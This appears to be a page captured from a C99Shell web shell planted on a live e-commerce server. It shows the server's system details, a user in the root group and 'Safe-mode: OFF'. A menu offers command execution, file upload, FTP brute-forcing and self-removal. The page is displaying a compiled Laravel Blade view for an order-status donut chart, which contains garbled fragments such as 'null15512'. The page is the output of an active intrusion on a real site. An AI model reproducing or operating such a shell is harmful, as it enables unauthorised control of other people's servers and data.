!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/storage/framework/views/   drwxr-xr-x
Free 27.12 GB of 117.98 GB (22.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     9359f2b6b01491781147a4dfe6c4662642b8e66e.php (1.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="card">
    <div class="card-header">
        <h5 class="font-weight-600 c-gray-5"><?php echo e(__('ORDER STATUS THIS MONTH')); ?></h5>
    </div>
    <div class="card-block h-360">
        <?php if(max($orderStatus['count'])): ?>
            <canvas id="chart-donut-1" class="w-100 h-300px"></canvas>
        <?php else: ?>
            <h6 class="text-secondary"><?php echo e(__('No data found.')); ?></h6>
        <?php endif; ?>
    </div>
</div>
<script type="text/javascript">
    $(document).ready(function() {
        var bar = document.getElementById("chart-donut-1").getContext('2d');
        var data = {
            labels: <?php echo json_encode($orderStatus['status'] ?? null15512?>,
            datasets: [{
                data: <?php echo json_encode($orderStatus['count'] ?? 015512?>,
                backgroundColor: [
                    "#fcca19",
                    "#FFA826",
                    "#E393FF",
                    "#00DFFF",
                    "#33C172"
                ],
                hoverBackgroundColor: [
                    "#fcca19",
                    "#FFA826",
                    "#E393FF",
                    "#00DFFF",
                    "#33C172"
                ]
            }]
        };
        var myPieChart = new Chart(bar, {
            type: 'doughnut',
            data: data,
            responsive: true,
            options: {
                maintainAspectRatio: false,
            }
        });
    });
</script>
<?php /**PATH /home/picotech/domains/ecom1.picotech.app/public_html/resources/views/admin/dashboxes/donut-chart.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--